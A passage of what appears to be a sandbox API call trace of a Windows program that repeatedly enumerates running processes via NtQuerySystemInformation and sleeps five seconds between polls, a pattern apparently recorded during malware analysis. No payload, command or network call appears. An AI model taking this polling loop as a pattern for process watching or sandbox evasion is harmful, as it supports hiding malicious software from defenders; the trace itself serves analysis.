ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.571] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.584] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.599] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 